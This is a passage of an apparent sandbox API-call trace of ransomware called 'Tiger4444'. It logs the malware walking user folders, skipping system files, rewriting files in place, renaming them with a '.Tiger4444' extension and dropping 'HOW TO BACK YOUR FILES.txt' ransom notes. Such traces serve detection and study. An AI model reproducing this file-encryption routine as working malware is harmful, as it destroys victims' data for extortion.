Size=0x104) returned 0xc75fe0 [0049.810] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.810] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.810] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0049.811] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14126399828) returned 1 [0049.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0049.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0049.811] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.811] CloseHandle (hObject=0x2c8) returned 1 [0049.811] CloseHandle (hObject=0x260) returned 1 [0049.813] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\yeOiJ.swf.Tiger4444") returned 50 [0049.813] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\yeOiJ.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\yeoij.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\yeOiJ.swf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\yeoij.swf.tiger4444"), dwFlags=0x1) returned 1 [0049.814] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x257dc1e0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0xd3a80f20, ftLastAccessTime.dwHighDateTime=0x1d4c8fb, ftLastWriteTime.dwLowDateTime=0xd3a80f20, ftLastWriteTime.dwHighDateTime=0x1d4c8fb, nFileSizeHigh=0x0, nFileSizeLow=0x21ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywdty.avi", cAlternateFileName="")) returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="Tiger4444.exe") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2=".") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="..") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="windows") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="bootmgr") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="pagefile.sys") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="boot") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="ids.txt") returned 1 [0049.814] lstrcmpiW (lpString1="ywdty.avi", lpString2="NTUSER.DAT") returned 1 [0049.814] lstrcpyW (in: lpString1=0x30aeae6, lpString2="ywdty.avi" | out: lpString1="ywdty.avi") returned="ywdty.avi" [0049.814] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ywdty.avi", dwFileAttributes=0x0) returned 1 [0049.815] lstrlenW (lpString="ywdty.avi") returned 9 [0049.815] lstrlenW (lpString="Tiger4444") returned 9 [0049.815] lstrcmpiW (lpString1="ywdty.avi", lpString2="Tiger4444") returned 1 [0049.815] lstrlenW (lpString=".dll") returned 4 [0049.815] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0049.815] lstrlenW (lpString=".lnk") returned 4 [0049.815] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0049.815] lstrlenW (lpString=".ini") returned 4 [0049.815] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0049.815] lstrlenW (lpString=".sys") returned 4 [0049.815] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0049.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ywdty.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\ywdty.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.815] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.815] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14126811011) returned 1 [0049.815] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8682) returned 1 [0049.815] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0049.815] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0049.815] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24f0, lpName=0x0) returned 0x2c8 [0049.815] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24f0) returned 0xbe0000 [0049.816] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.816] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.816] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0049.816] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.816] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14126940461) returned 1 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0049.816] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0049.816] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.817] CloseHandle (hObject=0x2c8) returned 1 [0049.817] CloseHandle (hObject=0x260) returned 1 [0049.818] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ywdty.avi.Tiger4444") returned 50 [0049.818] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ywdty.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\ywdty.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\ywdty.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\ywdty.avi.tiger4444"), dwFlags=0x1) returned 1 [0049.818] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa454c10, ftCreationTime.dwHighDateTime=0x1d4c77a, ftLastAccessTime.dwLowDateTime=0x229557f0, ftLastAccessTime.dwHighDateTime=0x1d4c901, ftLastWriteTime.dwLowDateTime=0x229557f0, ftLastWriteTime.dwHighDateTime=0x1d4c901, nFileSizeHigh=0x0, nFileSizeLow=0x880d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zqzX.png", cAlternateFileName="")) returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="Tiger4444.exe") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2=".") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="..") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="windows") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="bootmgr") returned 1 [0049.818] lstrcmpiW (lpString1="zqzX.png", lpString2="pagefile.sys") returned 1 [0049.819] lstrcmpiW (lpString1="zqzX.png", lpString2="boot") returned 1 [0049.819] lstrcmpiW (lpString1="zqzX.png", lpString2="ids.txt") returned 1 [0049.819] lstrcmpiW (lpString1="zqzX.png", lpString2="NTUSER.DAT") returned 1 [0049.819] lstrcpyW (in: lpString1=0x30aeae6, lpString2="zqzX.png" | out: lpString1="zqzX.png") returned="zqzX.png" [0049.819] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\zqzX.png", dwFileAttributes=0x0) returned 1 [0049.819] lstrlenW (lpString="zqzX.png") returned 8 [0049.819] lstrlenW (lpString="Tiger4444") returned 9 [0049.819] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0049.819] lstrlenW (lpString=".dll") returned 4 [0049.819] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0049.819] lstrlenW (lpString=".lnk") returned 4 [0049.819] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0049.819] lstrlenW (lpString=".ini") returned 4 [0049.819] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0049.819] lstrlenW (lpString=".sys") returned 4 [0049.819] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0049.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\zqzX.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\zqzx.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.819] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.819] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14127235559) returned 1 [0049.819] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=34829) returned 1 [0049.819] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0049.819] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0049.819] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b10, lpName=0x0) returned 0x2c8 [0049.820] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b10) returned 0xbe0000 [0049.820] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.820] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0049.821] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.821] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14127398200) returned 1 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0049.821] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0049.821] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.821] CloseHandle (hObject=0x2c8) returned 1 [0049.821] CloseHandle (hObject=0x260) returned 1 [0049.822] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\zqzX.png.Tiger4444") returned 49 [0049.822] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\zqzX.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\zqzx.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\zqzX.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\zqzx.png.tiger4444"), dwFlags=0x1) returned 1 [0049.823] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa454c10, ftCreationTime.dwHighDateTime=0x1d4c77a, ftLastAccessTime.dwLowDateTime=0x229557f0, ftLastAccessTime.dwHighDateTime=0x1d4c901, ftLastWriteTime.dwLowDateTime=0x229557f0, ftLastWriteTime.dwHighDateTime=0x1d4c901, nFileSizeHigh=0x0, nFileSizeLow=0x880d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zqzX.png", cAlternateFileName="")) returned 0 [0049.823] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0049.823] lstrcpyW (in: lpString1=0x30aeae6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.823] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0049.825] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0049.825] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0049.826] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.826] CloseHandle (hObject=0x260) returned 1 [0049.826] CloseHandle (hObject=0x2ac) returned 1 [0049.826] GetCurrentThreadId () returned 0xfa8 [0049.826] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0049.826] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Contacts", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0049.826] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72d88 | out: hHeap=0xc50000) returned 1 [0049.826] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0049.826] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Contacts" | out: lpString1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0049.826] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Contacts\\") returned="C:\\Users\\FD1HVy\\Contacts\\" [0049.826] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Contacts\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3" [0049.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\contacts\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0049.827] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0049.830] FlushFileBuffers (hFile=0x2ac) returned 1 [0049.831] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.831] CloseHandle (hObject=0x2ac) returned 1 [0049.832] lstrlenW (lpString="C:\\Users\\FD1HVy\\Contacts") returned 24 [0049.832] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82b7770d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0049.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.832] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.832] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0049.832] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.832] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82b7770d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.832] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.832] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.832] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0049.832] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.832] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.832] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82b7770d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82b7770d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82b7770d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.832] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.832] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.832] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.832] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.832] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.833] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.833] lstrcpyW (in: lpString1=0x30aeada, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.833] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\desktop.ini", dwFileAttributes=0x22) returned 1 [0049.833] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\desktop.ini", dwFileAttributes=0x6) returned 1 [0049.833] lstrlenW (lpString="desktop.ini") returned 11 [0049.833] lstrlenW (lpString="Tiger4444") returned 9 [0049.833] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0049.833] lstrlenW (lpString=".dll") returned 4 [0049.833] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.833] lstrlenW (lpString=".lnk") returned 4 [0049.833] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.833] lstrlenW (lpString=".ini") returned 4 [0049.833] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.833] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0049.833] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0049.833] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.834] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\contacts\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0049.834] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0049.834] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0049.834] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.834] CloseHandle (hObject=0x260) returned 1 [0049.834] CloseHandle (hObject=0x2ac) returned 1 [0049.834] GetCurrentThreadId () returned 0xfa8 [0049.834] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0049.835] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0049.835] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67608 | out: hHeap=0xc50000) returned 1 [0049.835] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0049.835] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0049.835] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0049.835] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3" [0049.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0049.836] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0049.838] FlushFileBuffers (hFile=0x2ac) returned 1 [0049.839] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.839] CloseHandle (hObject=0x2ac) returned 1 [0049.840] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData") returned 23 [0049.840] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.840] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x82b9d7a4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0049.840] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.840] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.840] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0049.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 